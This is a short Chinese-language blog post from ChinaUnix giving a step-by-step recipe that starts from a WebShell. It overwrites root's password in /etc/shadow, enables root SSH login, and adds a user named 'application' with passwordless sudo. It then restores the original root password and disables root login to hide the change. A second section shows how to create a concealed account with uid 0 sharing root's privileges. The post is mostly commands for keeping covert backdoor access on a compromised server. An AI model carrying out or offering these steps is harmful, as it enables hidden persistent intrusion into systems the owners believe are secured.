Chinaunix首页 | 论坛 | 博客
  • 博客访问: 444074
  • 博文数量: 85
  • 博客积分: 3580
  • 博客等级: 中校
  • 技术积分: 970
  • 用 户 组: 普通用户
  • 注册时间: 2010-03-09 14:09
文章分类

全部博文(85)

文章存档

2011年(7)

2010年(78)

我的朋友

分类:

2010-12-03 17:04:23

1.WebShell直接替换Root密码:/etc/shadow    //记得备份

2.允许Root通过ssh登陆:
    修改:/etc/ssh/sshd_config
    PermitRootLogin yes   #允许Root登陆

3.重启ssh服务:service ssh restart

4.以Root身份登陆ssh,增加一个用户:
    useradd application
    passwd    //根据提示设置密码

5.更改application用户运行su不需密码:
   chmod +w /etc/sudoers    //增加写入权限,默认只读
   修改:/etc/sudoers
   vi /etc/sudoers
   加入:application   ALL=(ALL)        NOPASSWD: ALL

6.把Root密码修改回原样,禁止Root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。

7.当然最后还要:chmod -w /etc/sudoers

 
 
 
 
echo "$USER|$EUID"
=========================================================
useradd -u 0   -o   -g root   -G root -d /home/user1 user1
userdel [-r] [要删除的用户的名称]
-u 0 指将uid指定为0(零)与root相同,登录后的提示符为#而非$.
-o 指因为重复了uid(与root帐号的uid重复)必须指定这个参数.
-g root 初始化组的组名,当用户属于多个组时,(在-G参数中指定),登录时所在组。缺省该项时,系统新建一个与用户名同名的组,并且初始化时设为该组名.而不论-G指定为哪些组.
-G root 指定用户名所属的组列表,一个用户可以属于多个组,组名间用逗号分隔,组名必须已经存在.
-d /home/user1指定用户的属主目录
user1 新建的用户名为user1.
-r 删除目录
测试:可以用id user1命令测试用户名user1的属性,显示为:
uid=0(root),gid=0(root),group=0(root)
说明:gid指明的即为初始化GID号.
========================================================
chmod u+w /etc/sudoers
编辑/etc/sudoers文件
root ALL=(ALL) ALL
xxx ALL=(ALL) ALL (这里的xxx是你的用户名)
撤销文件的写权限。也就是输入命令"chmod u-w /etc/sudoers"
阅读(900) | 评论(0) | 转发(0) |
0

上一篇:EXE关联文件出错

下一篇:motd与issue

给主人留下些什么吧!~~